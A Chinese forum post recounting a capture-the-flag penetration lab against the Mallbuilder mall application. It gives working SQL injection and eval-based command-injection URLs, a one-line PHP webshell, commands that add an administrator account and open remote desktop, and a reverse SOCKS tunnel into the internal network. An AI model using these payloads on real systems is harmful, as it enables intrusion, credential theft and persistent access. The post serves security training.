安全矩阵

 找回密码
 立即注册
搜索
查看: 963|回复: 0

记一次综合靶场实战渗透

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-10-16 10:35:36 | 显示全部楼层 |阅读模式
衡阳信安 2023-10-15 00:00 发表于湖南

前言
时间有点久,这里主要和大家分享一下思路。
该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。
开始渗透
首先进入靶场开放的唯一一个开放的web端。
进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。
payload:
  1. /cate_show_ajax.php?oper=ajax&call=get_cate POST catid=12313213131313113) and EXP(~(SELECT*FROM(SElect user FROM mallbuilder_admin)a limit 0,1 ))#
复制代码


md5解密后得知admin 密码为:mall123!@#

可以通过sql注入获取第一个flag
payload:
  1. /cate_show_ajax.php?oper=ajax&call=get_cate
复制代码

post提交:
catid=12313213131313113) and EXP(~(SELECT*FROM(SElect flag FROM flag)a))#

得到第一个flag
登录管理账号admin 密码为 mall123!@# ,进入后台
查看源代码,发现第二个flag

网上没有公开的后台 getshell 的漏洞,需要下载一份源码进行简单的审计
源码地址:https://github.com/source-trace/mallbuilder
在 admin\module_translations.php 存在命令执行
  1. <?php
  2.     include_once("../includes/global.php");
  3.     $script_tmp = explode('/', $_SERVER['SCRIPT_NAME']);
  4.     $sctiptName = array_pop($script_tmp);
  5.     include_once("auth.php");

  6.     if(empty($_POST))
  7.     {
  8.         $refer_lang = $_GET['code'] =='en'?'cn':'en';   //基本参照语言
  9.         $l = $rl = array();echo "start";
  10.         @include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$_GET['code'].'.php');

  11.         @eval('$l =$_LANG_MOD_'.strtoupper($_GET['mod']).';');  
  12.         @include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$refer_lang.'.php');
  13.         @eval('$rl =$_LANG_MOD_'.strtoupper($_GET['mod']).';');

  14.         $diff_lang = @array_diff_key($rl,$l);
  15.         $l += $diff_lang;
  16.         if($l=='')
  17.             die($lang['translat_data_emp']);
  18.     }else{
  19.            if($config['enable_tranl']==0)
  20.           {
  21.                 die($lang['tranl_fordid']);
  22.           }
  23.             include_once("../includes/lang_class.php");
  24.             $tr_lang = new lang();
  25.             foreach($tr_lang->module_files() as $key=>$mod)
  26.             {   
  27.                 if(isset($_POST[strtolower($mod)]))
  28.                 {   
  29.                     $tr_lang->save_module_files( $_POST[strtolower($mod)],$key,$_GET['code'] );
  30.                     echo "<script>parent.window.succ_trans_tip('$key');</script>";
  31.                     break;
  32.                 }
  33.             }
  34.             die();
  35.     }
  36. ?>
复制代码
mod 参数被带入 eval 执行,但是中间经过了 strtoupper 函数,这个在后期写马的时候需要注意
  1. /admin/module_translations.php?mod=;system('whoami')
复制代码

  1. /admin/module_translations.php?mod=;system('dir')
复制代码
发现flag.php
直接 type 读取
payload:
/admin/module_translations.php?mod=;system('type flag.php')
得到第三个flag


由于有cookie不能直接连接,所以先写一个马出来,需要注意strtoupper函数
经过测试,发现上传一句话木马只能用数字命名,如下例的1.php
  1. /admin/module_translations.php?mod=;file_put_contents('1.php','<?php @eval($_POST[1]);?>')
复制代码
使用菜刀连接(2333当时还是用的菜刀)
在C盘根目录下发现flag.txt,但是没有权限读取
打开Cknife的模拟终端,执行命令
net user simple 111Qqq... /add 添加一个叫做 simple的用户
net localgroup administrators simple /add 将 simple 添加到管理员组中
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 开启远程桌面
netstat -an 查看开放端口


发现3389端口开放成功,使用windows下自带的工具mstsc.exe进行远程桌面连接
使用创建的simple账户登录进入后找到在C盘根目录下的flag.txt 修改文件权限,即可读到第四个flag
在管理员桌面发现第五个flag
进入内网
除了一个开发web端可以直接访问,其他都是内网环境,需要做端口转发,这里用EarthWorm配合proxifier进行端口转发和全局代理设置。目的是可以通过本机访问内网环境。
EarthWorm官网包含使用教程:https://rootkiter.com/EarthWorm/
在端口转发之前首先在本地开启接收转发,使用Earthworm
命令: ew_for_Win.exe -s rcsocks -l 1080 -e 8888
显示start listen port here即可
使用菜刀将端口转发工具:Earthworm 上传到网站目录下,进入模拟终端,使用工具进行端口转发。
在模拟终端执行命令:ew_for_Win.exe -s rssocks -d 10.10.80.27 -e 8888
使用proxifier配置服务器代理,配置代理规则即可实现本机访问内网ip
后记
EarthWarm官网已停止更新并且停止下载,这里给大家分享:EarthWarm
另外内网穿透推荐使用nps,nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。
地址:https://github.com/ehang-io/nps

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:44 , Processed in 0.021092 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表